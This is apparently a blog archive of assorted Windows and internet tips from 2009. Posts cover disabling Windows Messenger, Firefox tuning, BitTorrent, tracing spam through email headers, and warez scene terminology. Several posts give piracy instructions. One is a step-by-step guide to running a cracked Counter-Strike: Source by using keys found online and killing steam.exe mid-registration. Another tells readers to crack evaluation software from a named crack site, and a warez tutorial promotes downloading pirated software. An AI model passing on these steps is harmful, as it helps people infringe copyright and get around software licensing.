NOTE: You can use the firewall approach only if your system doesn't communicate with legacy systems that rely on NetBIOS name resolution to locate machines and shared resources. If, for example, you let users running Windows 9x share your printer or scanner, when you disable inbound NetBIOS traffic, users won't be able to connect to these shared resources. Regardless of the method you choose, you can stop messenger spam

2. Program

1. Example 1

NOTE: On Oct 15, 2003, Mcft releases Critical Security Bulletin MS03-043 warning users that the Windows Messenger Service running and exposed by default in all versions of Windows NT, 2000 and XP, contains a "Remote Code Execution" vulnerability that allows any not otherwise secured and protected Windows machine to be taken over and remotely compromised over the Internet
1. Shoot the Messenger
Code:
http://grc.com/files/shootthemessenger.exe

2. Example 2

1. Messenger Disable
Code:
http://www.dougknox.com/xp/utils/MessengerDisable.zip

NOTE: If you choose to uninstall Windows Messenger on a system with SP1 installed, you will receive an error message about "un-registering" an OCX file. This is normal, and doest not affect the removal process. Windows Messenger will still be removed

3. TEST

1. Example 1

1. Right-click "My Computer"
2. Select "Manage"
3. Under "System Tools" right-click on "Shared Folders"
4. Choose "All Tasks" and select "Send Console Message..."
5. If you recieve the following error message then the service has been disabled, otherwise confirm that you have disabled it or try another example
"The following error occured while reading the list of sessions from Windows clients:
Error 2114: The Server service is not started."

2. Example 2

1. Click Start then "Run"
2. Type in {cmd.exe}
3. Type in net send 127.0.0.1 hi
4. If you get a popup "hi" message, then confirm that you have disabled it or try another example

4. IF YOU INSIST

1. If you insist on keeping Windows Messenger, then I'd recommend Messenger Manager - "Allows you to keep your messenger service running, as is intended and needed by Windows. This ensures that vital system errors and notifications may be sent informing you of Important System Events"
Code:
http://www.sellertools.com/default.asp?i=MessageManager3.htm

2. However, as a replacement to Windows Messenger remote control feature, I'd recommend this free tool Virtual Network Computing - "It is a remote control software which allows you to view and interact with one computer (the "server") using a simple program (the "viewer") on another computer anywhere on the Internet. The two computers don't even have to be the same type, so for example you can use VNC to view an office Linux machine on your Windows PC at home"
Code:
http://www.realvnc.com/download.html

RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

Downloading Windows Media Streams

2009-04-24T12:19:00.000-05:00

Look for the video source url in the webpage source code and copy it:

user posted image
To view the source code, r-click on the webpage that plays the video and select "view source." If unable to do so, just close the window and in the main Internet Explorer (IE) window, click the History icon or press Ctrl+H. Look for the same webpage on the left pane. On the menu, click View > View source.

Paste the video source url in Windows Media Player. (File > Open URL... )
Let the video play now. When the correct title appears on the playlist pane, r-click on it and select "Properties."
Select the source url and copy it:
user posted image

tongue.gif Paste this url in Flashget to downl

Getting Counter-Strike Source to work

2009-04-02T20:51:00.001-05:00

Step 1- Download cssource_notcracked_beta_emporio.rar, cssource_cracked_emporio.rar and cssource_updates_emporio.rar (make sure this update is V2).

Step 2- Extract cssource_notcracked_beta_emporio.rar to a folder (for this example we will use E:/CS: Source*), then extract cssource_cracked_emporio.rar to E:/CS: Source*(overwrite all files) and finally extract cssource_updates_emporio.rar(V2) to E:/CS: Source* (overwrite all files).

Step 3- Make a NEW steam account(We will use Bob1g2** for this example).

Step 4- Now here comes the tricky part. After you have made a NEW steam account, get any counter strike: condition zero key (and no i won't tell you one) off the internet. Launch steam and click on Condition Zero in the Avaible Games list. Click on Register this product and click next. Once you get to the point where it says, "Steam is processing you request" open up Task Manager (Ctrl, Alt, Delete at the same time) and click on steam.exe and once the steam window has 1 bar that is yellow, click terinate process on the task manager.

Step 5- Open up steam again and check if Condition Zero is in your My Games list. If it isn't then repeat Step 3 using a different key untill you get Condition Zero is your My Games list. Once you get it in your My Games list then, download Codename Gordon and once it has finished downloading, launch it. Once you get into the menu, then click exit.

Step 6- Go into the folder where you installed steam and copy ClientRegistry.blob into the folder where you installed CS: Source.

Step 7- Go into the folder where you installed CS: Source and open up SteamApp.cfg.

Step 8- Once you have opened up SteamApp.cfg, edit it so it only has this in it:

CODE

SteamAppId=10
#SteamAppVersionId=0
SteamInstallPath="E:/CS: Source*"
# [as is clearified later on, this should be your email address:]
#SteamAppUser=aalb002@cafe.boomtown.net
SteamAppUser=Bob1g2**

Make sure you change the Bob1g2** bit to the new steam account you created and the E:/CS: Source* to where you installed counter-strike source.

Step 9- Make a sortcut of hl2.exe with these in the sortcut(without the quotes) "-steam -game cstrike"

*Change this to where you installed CS: Source.
**Change this to your new steam account.

Firefox Tweeks

2009-04-02T20:34:00.000-05:00

Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300

One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!

Bit Torrent Tutorials II

2009-03-31T00:13:00.001-05:00

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Bit Torrent Tutorials

2009-03-31T00:12:00.000-05:00

Backtracking EMAIL Messages

2009-03-30T23:34:00.000-05:00

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

All About Movie Tags (what Is A Dvdrip, Cam Etc.) IV

2009-03-15T20:32:00.000-05:00

Usenet Information

Access -
To get onto newsgroups, you will need a news server. Most ISPs supply one, but this is usually of poor retention (the amount of time the files are on server for) and poor completition (the amount of files that make it there). For the best service, a premium news server should be paid for, and these will often have bandwidth restrictions in place.

Software -
You will need a newsreader to access the files in the binary newsgroups. There are many different readers, and its usually down to personal opinion which is best. Xnews / Forte Agent / BNR 1 / BNR 2 are amongst the popular choices. Outlook has the ability to read newsgroups, but its recommended to not use that.

Format -
Usenet posts are often the same as those listed on VCDQUALiTY (i.e., untouched group releases) but you have to check the filenames and the description to make sure you get what you think you are getting. Generally releases should come down in .RAR sets. Posts will usually take more than one day to be uploaded, and can be spread out as far as a week.

PAR files -
As well as the .rxx files, you will also see files listed as .pxx/.par . These are PARITY files. Parity files are common in usenet posts, as a lot of times, there will be at least one or two damaged files on some servers. A parity file can be used to replace ANY ONE file that is missing from the rar set. The more PAR files you have, the more files you can replace. You will need a program called SMARTPAR for this.

Scene Tags

PROPER -
Due to scene rules, whoever releases the first Telesync has won that race (for example). But if the quality of that release is fairly poor, if another group has another telesync (or the same source in higher quality) then the tag PROPER is added to the folder to avoid being duped. PROPER is the most subjective tag in the scene, and a lot of people will generally argue whether the PROPER is better than the original release. A lot of groups release PROPERS just out of desperation due to losing the race. A reason for the PROPER should always be included in the NFO.

SUBBED -
In the case of a VCD, if a release is subbed, it usually means it has hard encoded subtitles burnt throughout the movie. These are generally in malaysian/chinese/thai etc, and sometimes there are two different languages, which can take up quite a large amount of the screen. SVCD supports switch able subtitles, so some DVDRips are released with switch able subs. This will be mentioned in the NFO file if included.

UNSUBBED -
When a film has had a subbed release in the past, an Unsubbed release may be released

LIMITED -
A limited movie means it has had a limited theater run, generally opening in less than 250 theaters, generally smaller films (such as art house films) are released as limited.

INTERNAL -
An internal release is done for several reasons. Classic DVD groups do a lot of .INTERNAL. releases, as they wont be dupe'd on it. Also lower quality theater rips are done INTERNAL so not to lower the reputation of the group, or due to the amount of rips done already. An INTERNAL release is available as normal on the groups affiliate sites, but they can't be traded to other sites without request from the site ops. Some INTERNAL releases still trickle down to IRC/Newsgroups, it usually depends on the title and the popularity. Earlier in the year people referred to Centropy going "internal". This meant the group were only releasing the movies to their members and site ops. This is in a different context to the usual definition.

STV -
Straight To Video. Was never released in theaters, and therefore a lot of sites do not allow these.

OTHER TAGS -

*WS* for widescreen (letterbox)
*FS* for Fullscreen.

RECODE -
A recode is a previously released version, usually filtered through TMPGenc to remove subtitles, fix color etc. Whilst they can look better, its not looked upon highly as groups are expected to obtain their own sources.

REPACK -
If a group releases a bad rip, they will release a Repack which will fix the problems.

NUKED -
A film can be nuked for various reasons. Individual sites will nuke for breaking their rules (such as "No Telesyncs") but if the film has something extremely wrong with it (no soundtrack for 20mins, CD2 is incorrect film/game etc) then a global nuke will occur, and people trading it across sites will lose their credits. Nuked films can still reach other sources such as p2p/usenet, but its a good idea to check why it was nuked first in case. If a group realise there is something wrong, they can request a nuke.

NUKE REASONS :: this is a list of common reasons a film can be nuked for (generally DVDRip)

** BAD A/R ** :: bad aspect ratio, ie people appear too fat/thin
** BAD IVTC ** :: bad inverse telecine. process of converting framerates was incorrect.
** INTERLACED ** :: black lines on movement as the field order is incorrect.

DUPE -
Dupe is quite simply, if something exists already, then theres no reason for it to exist again without proper reason.

All About Movie Tags (what Is A Dvdrip, Cam Etc.) Part III

2009-03-15T20:30:00.003-05:00

Misc Info

Regional Coding -
This was designed to stop people buying American DVDs and watching them earlier in other countries, or for older films where world distribution is handled by different companies. A lot of players can either be hacked with a chip, or via a remote to disable this.

RCE -
RCE (Regional Coding Enhancement) was designed to overcome "Multiregion" players, but it had a lot of faults and was overcome. Very few titles are RCE encoded now, and it was very unpopular.

Macrovision -
Macrovision is the copy protection employed on most commercial DVDs. Its a system that will display lines and darken the images of copies that are made by sending the VHS signals it can't understand. Certain DVD players (for example the Dansai 852 from Tescos) have a secret menu where you can disable the macrovision, or a "video stabaliser" costs about 30UKP from Maplin (www.maplin.co.uk)

NTSC/PAL -
NTSC and PAL are the two main standards used across the world. NTSC has a higher frame rate than pal (29fps compared to 25fps) but PAL has an increased resolution, and gives off a generally sharper picture. Playing NTSC discs on PAL systems seems a lot easier than vice-versa, which is good news for the Brits An RGB enabled scart lead will play an NTSC picture in full colour on most modern tv sets, but to record this to a VHS tape, you will need to convert it to PAL50 (not PAL60 as the majority of DVD players do.) This is either achieved by an expensive converter box (in the regions of £200+) an onboard converter (such as the Dansai 852 / certain Daewoos / Samsung 709 ) or using a World Standards VCR which can record in any format.

News Sites -
There are generally 2 news sites for film release for p2p and they are:

nforce - VCD Help
Code:
http://www.vcdhelp.com/

Code:
http://www.nforce.nl.

About Release Files

RARset -
The movies are all supplied in RAR form, whether its v2 (rar>.rxx) or v3 (part01.rar > partxx.rar) form.

BIN/CUE -
VCD and SVCD films will extract to give a BIN/CUE. Load the .CUE into notepad and make sure the first line contains only a filename, and no path information. Then load the cue into Nero/CDRWin etc and this will burn the VCD/SVCD correctly. TV rips are released as MPEG. DivX files are just the plain DivX - .AVI

All About Movie Tags (what Is A Dvdrip, Cam Etc.)
NFO -
An NFO file is supplied with each movie to promote the group, and give general iNFOrmation about the release, such as format, source, size, and any notes that may be of use. They are also used to recruit members and acquire hardware for the group.

SFV -
Also supplied for each disc is an SFV file. These are mainly used on site level to check each file has been uploaded correctly, but are also handy for people downloading to check they have all the files, and the CRC is correct. A program such as pdSFV or hkSFV is required to use these files.

All About Movie Tags (what Is A Dvdrip, Cam Etc.) Part II

2009-03-15T20:30:00.002-05:00

Formats

VCD -
VCD is an mpeg1 based format, with a constant bitrate of 1150kbit at a resolution of 352x240 (NTCS). VCDs are generally used for lower quality transfers (CAM/TS/TC/Screener(VHS)/TVrip(analogue) in order to make smaller file sizes, and fit as much on a single disc as possible. Both VCDs and SVCDs are timed in minutes, rather than MB, so when looking at an mpeg, it may appear larger than the disc capacity, and in reality u can fit 74min on a CDR74.

SVCD -
SVCD is an mpeg2 based (same as DVD) which allows variable bit-rates of up to 2500kbits at a resolution of 480x480 (NTSC) which is then decompressed into a 4:3 aspect ratio when played back. Due to the variable bit-rate, the length you can fit on a single CDR is not fixed, but generally between 35-60 Mins are the most common. To get a better SVCD encode using variable bit-rates, it is important to use multiple "passes". this takes a lot longer, but the results are far clearer.

XVCD/XSVCD -
These are basically VCD/SVCD that don't obey the "rules". They are both capable of much higher resolutions and bit-rates, but it all depends on the player to whether the disc can be played. X(S)VCD are total non-standards, and are usually for home-ripping by people who don't intend to release them.

KVCD Thanks for lardo4life for the info
KVCD is a modification to the standard MPEG-1 and MPEG-2 GOP structure and Quantization Matrix. It enables you to create over 120 minutes of near DVD quality video, depending on your material, on a single 80 minute CD-R/CD-RW. We have published these specifications as KVCDx3, our official resolution, which produce 528x480 (NTSC) and 528x576 (PAL) MPEG-1 variable bit rate video, from 64Kbps to 3,000Kbps. Using a resolution of 352x240 (NTSC) or 352x288 (PAL), it's possible to encode video up to ~360 minutes of near VCD quality on a single 80 minute CD-R. The mpeg files created will play back in most modern standalone DVD players. You must burn the KVCD MPEG files as non-standard VCD or non-standard SVCD (depends on your player) with Nero or VCDEasy.

DivX / XviD -
DivX is a format designed for multimedia platforms. It uses two codecs, one low motion, one high motion. most older films were encoded in low motion only, and they have problems with high motion too. A method known as SBC (Smart Bit-rate Control) was developed which switches codecs at the encoding stage, making a much better print. The format is Ana orphic and the bit-rate/resolution are interchangeable. Due to the higher processing power required, and the different codecs for playback, its unlikely we'll see a DVD player capable of play DivX for quite a while, if at all. There have been players in development which are supposedly capable, but nothing has ever arisen. The majority of PROPER DivX rips (not Re-Encs) are taken from DVDs, and generally up to 2hours in good quality is possible per disc. Various codecs exist, most popular being the original Divx3.11a and the new XviD codecs.

CVD -
CVD is a combination of VCD and SVCD formats, and is generally supported by a majority of DVD players. It supports MPEG2 bit-rates of SVCD, but uses a resolution of 352x480(ntsc) as the horizontal resolution is generally less important. Currently no groups release in CVD.

DVD-R -
Is the recordable DVD solution that seems to be the most popular (out of DVD-RAM, DVD-R and DVD+R). it holds 4.7gb of data per side, and double sided discs are available, so discs can hold nearly 10gb in some circumstances. SVCD mpeg2 images must be converted before they can be burnt to DVD-R and played successfully. DVD>DVDR copies are possible, but sometimes extras/languages have to be removed to stick within the available 4.7gb.

MiniDVD -
MiniDVD/cDVD is the same format as DVD but on a standard CDR/CDRW. Because of the high resolution/bit-rates, its only possible to fit about 18-21 mins of footage per disc, and the format is only compatible with a few players.

All About Movie Tags (what Is A Dvdrip, Cam Etc.)

2009-03-15T20:23:00.002-05:00

Original Sources

CAM -
A cam is a theater rip usually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera make shake. Also seating placement isn't always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there's text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from the onboard microphone of the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes we're lucky, and the theater will be fairly empty and a fairly clear signal will be heard.

TELESYNC (TS) - A telesync is the same spec as a CAM except it uses an external audio source (most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release. A high percentage of Telesyncs are CAMs that have been mislabeled.

TELECINE (TC) -
A telecine machine copies the film digitally from the reels. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, although 4:3 telecines have existed. A great example is the JURASSIC PARK 3 TC done last year. TC should not be confused with TimeCode , which is a visible counter on screen throughout the film.

SCREENER (SCR) -
A pre VHS tape, sent to rental stores, and various other places for promotional use. A screener is supplied on a VHS tape, and is usually in a 4:3 (full screen) a/r, although letterboxed screeners are sometimes found. The main draw back is a "ticker" (a message that scrolls past at the bottom of the screen, with the copyright and anti-copy telephone number). Also, if the tape contains any serial numbers, or any other markings that could lead to the source of the tape, these will have to be blocked, usually with a black mark over the section. This is sometimes only for a few seconds, but unfortunately on some copies this will last for the entire film, and some can be quite big. Depending on the equipment used, screener quality can range from excellent if done from a MASTER copy, to very poor if done on an old VHS recorder thru poor capture equipment on a copied tape. Most screeners are transferred to VCD, but a few attempts at SVCD have occurred, some looking better than others.

DVD-SCREENER (DVDscr) -Same premise as a screener, but transferred off a DVD. Usually letterbox , but without the extras that a DVD retail would contain. The ticker is not usually in the black bars, and will disrupt the viewing. If the ripper has any skill, a DVDscr should be very good. Usually transferred to SVCD or DivX/XviD.

DVDRip - A copy of the final released DVD. If possible this is released PRE retail (for example, Star Wars episode 2) again, should be excellent quality. DVDrips are released in SVCD and DivX/XviD.

VHSRip -Transferred off a retail VHS, mainly skating/sports videos and XXX releases.

TVRip -TV episode that is either from Network (capped using digital cable/satellite boxes are preferable) or PRE-AIR from satellite feeds sending the program around to networks a few days earlier (do not contain "dogs" but sometimes have flickers etc) Some programs such as WWF Raw Is War contain extra parts, and the "dark matches" and camera/commentary tests are included on the rips. PDTV is capped from a digital TV PCI card, generally giving the best results, and groups tend to release in SVCD for these. VCD/SVCD/DivX/XviD rips are all supported by the TV scene.

WORKPRINT (WP) -A workprint is a copy of the film that has not been finished. It can be missing scenes, music, and quality can range from excellent to very poor. Some WPs are very different from the final print (Men In Black is missing all the aliens, and has actors in their places) and others can contain extra scenes (Jay and Silent Bob) . WPs can be nice additions to the collection once a good quality final has been obtained.

DivX Re-Enc -A DivX re-enc is a film that has been taken from its original VCD source, and re-encoded into a small DivX file. Most commonly found on file sharers, these are usually labeled something like Film.Name.Group(1of2) etc. Common groups are SMR and TND. These aren't really worth downloading, unless you're that unsure about a film u only want a 200mb copy of it. Generally avoid.

Watermarks -
A lot of films come from Asian Silvers/PDVD (see below) and these are tagged by the people responsible. Usually with a letter/initials or a little logo, generally in one of the corners. Most famous are the "Z" "A" and "Globe" watermarks.

Asian Silvers / PDVD -
These are films put out by eastern bootleggers, and these are usually bought by some groups to put out as their own. Silvers are very cheap and easily available in a lot of countries, and its easy to put out a release, which is why there are so many in the scene at the moment, mainly from smaller groups who don't last more than a few releases. PDVDs are the same thing pressed onto a DVD. They have removable subtitles, and the quality is usually better than the silvers. These are ripped like a normal DVD, but usually released as VCD.

HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING

2009-03-14T21:44:00.000-05:00

Some people seem to think our network is a kind of a store a they just pick what they want without sharing anything!
(and other considere our net as a schoolyard where one "trade"... Childish!)

You can help everybody getting rid of them by boycotting them that way:

You "browse" each uploading user.

** If he/she shares more than, say, a hundred files (and NOT in the WinMx directory only, putting them elsewhere and unshared when entirely downloaded !!!), OK.
NB: a hundred is not a lot but 1- we don't all have a large HDD and some files are big 2- when you begin...!
** If not:

You can send a message to him/her to ask why there is no real share, or not at all, for they can have forgotten to do so: give them a chance! The first time, I didn't understand that I had to choose the shared files types, so I shared nothing, unwillingly. Somebody told it to me in a message.

If no answer and/or still no shared file, you can exclude the selfish beast:
(Thanks to dwhite who gave the modus operandi on the WinMx net)

To block somebody from downloading, add the name to your HOTLIST (right-click the name then "Add to hotlist") then to your IGNORE list.

You won't receive any messages nor will they enter your queue, during that session at least.

On the contrary, you can help people who share a lot by starting the tranfer when they are in your queue, or give a higher bandwith priority...

How To Add A Url Address Bar To The Taskbar

2009-03-14T20:56:00.000-05:00

You can add an Internet URL address bar to your Windows XP taskbar. Doing so will let you type in URLs and launch Web pages without first launching a browser. It will also let you launch some native Windows XP applications in much the same way as you would via the Run menu (so you could type in calc to launch the calculator or mspaint to launch Microsoft Paint. Here's how you add the address bar:

1. Right-click on the taskbar, select Toolbars, and then click Address.

2. The word Address will appear on your taskbar.

3. Double click it to access it.

4. If that doesn't work, your taskbar is locked. You can unlock it by right-clicking on the taskbar again and uncheck Lock the Taskbar.

NOTE: You may also need to grab the vertical dotted lines beside the word Address and drag it to the left to make the Address window appear.

Downloading Files, Using Archives And Images

2009-03-10T21:35:00.000-05:00

0x01.0 - the start...

So, you've just got a brand new internet connection thingie installed and it can handle up to 1 meg/sec download. But offcourse, no good PC without good software, but you know, good software is very expensive... And on a beautifull sunday morning you see something called Warez. Behold our kingdom and you start drewling a bit untill ur mom comes raging in your room asking for you to put the garbage out. After helping your mom out, the PC and fast inet connection is all yours... And so is the free software.

0x02.0 - packaged files.

As you might know, these software packages are sometimes pretty big in size. To try and reduce the big-file-downloads, the releasers of the package will often use some techniques to reduce the load. Techniques as compressing, archiving and splitting. Read-on if you dont understand these words..

0x02.1 - formats & tools.

If you've been around more than 1 year on the net, you prolly allready know all this but for the knew people I added this anyways...
The basic use of your Windows Operating System is the use of many different files and file-types. One of the most used file-types on the net is ZIP. File-types are also called 'formats'.
An overview:

ZIP A zipped file is a file thats been archived and compressed.
RAR RAR files are commonly used for archiving files; which is putting a large number of files in one file. Compressing is optional. File-splitting is optional.
ACE About the same as a RAR file, just an other format and another application.

I explain this to you because these file-types and coresponding programs are often, you can even use always here, used when you want to download Warez. The programs you download are almost always archived, compressed or bundled in one of the above formats. Keep reading if you didnt knew this

Ok so, now we know the formats of the files were gonna deal with, now the programs.
As you prolly figured out allready, these files arent created by Windows or by hand. Theyre made using specialy designed applications. Ill show you what applications you can use.

WinRAR : My personal favorite. Handles all of the above stated formats and alot, alot more. If you ask for my opinion, I think this is the only program you'll ever need.

WinZIP : This is a specially designed application for handleing ZIPPED files. If you like this one, take it.

WinACE : Another multi-file handling tool. Personal opinion: good for splitting files, way too big for every-day use for decompression.

I'd say: make your choice. I recommend WinRAR because of it's simplicity and effectiveness. But hey, I'm not forcing you. Just read some info on the sites and make ur choice.

Oh yea, one last thing: you'll notice these are all Evaluation versions. I suggest you crack them. Look for a good crack for the right version on: www.cracks.am.

0x02.2 - multi-part archives.

? These files are archived in multiple parts (with one of the applicatiosn mentioned above). Which means the software was zipped or rarred and divided into files of a smaller size then the whole thing together. How do you handle this?

>>> Download all the files to one directory.

>>> Check if all files are there. You can do this by looking at the extensions: *.00, *.01, ... If one's missing, download the missing file again (there are more sofisticated ways to do this but this is the simplest).

>>> Check if the files are about the same size. For example: the *.04 file must be the same size as the *.05 file, unless the 5th file is the last one.

>>> If theres a file with the extension *.RAR, double click it and u can start unpacking the stuff.

>>> If theres no *.RAR, but an *.ACE, do the same, its just an other format.

>>> Once you unarchived the package, you should have a directory full of files from an instalation or program. But its also possible there are, with the archived files, some other things:

- If the software pack is a Warez Group (MYTH, CLASS, Fairlight (FLT), ...) release, check if there's an EXE file with the package called Install.exe. If it's there, you can use that to unpack the files.

- If there's no exe in the package, the files are prolly just ready to be copied to your directory of choice // or ready to be installed.

IMPORTANT : please dont forget to read the NFO file. Its very important. It usually contains all further information needed for you to successfully install the software. You can open it with NFO-file viewers or in Notepad (set font to: terminal, 6 or 9 pts).

Normally, you're all done now and ready to start using the software.

? Ok, do I hear protest? Yes I do. It goes: "Hell, I downloaded a multi-part package but it has NO RAR OR ACE OR ZIP OR ANYTHING!!!! Just files with extensions called *.001; *.002, ..."

Your right. Although the situation is quite different from the situation above, it's really not so different when you look closer. Those files are just unarchived the same way:

>>> Select the first file (*.001).

>>> Right-click it and select 'Extract here...'

Watch the progress bar go! You see, its just the same method. You might notice theres only 2 or 3 files decompressed: ISO or CUE and BIN files. Thats fairly normal. Well talk about handling them in topic 0x03.0...

0x02.3 - one-file downloads.

Ok so the stuff u downloaded was none of above. Conclusion: you downloaded one big file. This happens quite often when you download things from fast-working FTPs.
What you need to do now:

>>> If the file is archived (.rar, .ace, .zip, ...), just unarchive it.

>>> If the file u unrachived is some weird *.ISO or *.CUE file, go to 0x03.0.

>>> If not, just continue the procedure as stated in 0x02.2.

0x03.0 - a clear view on images.

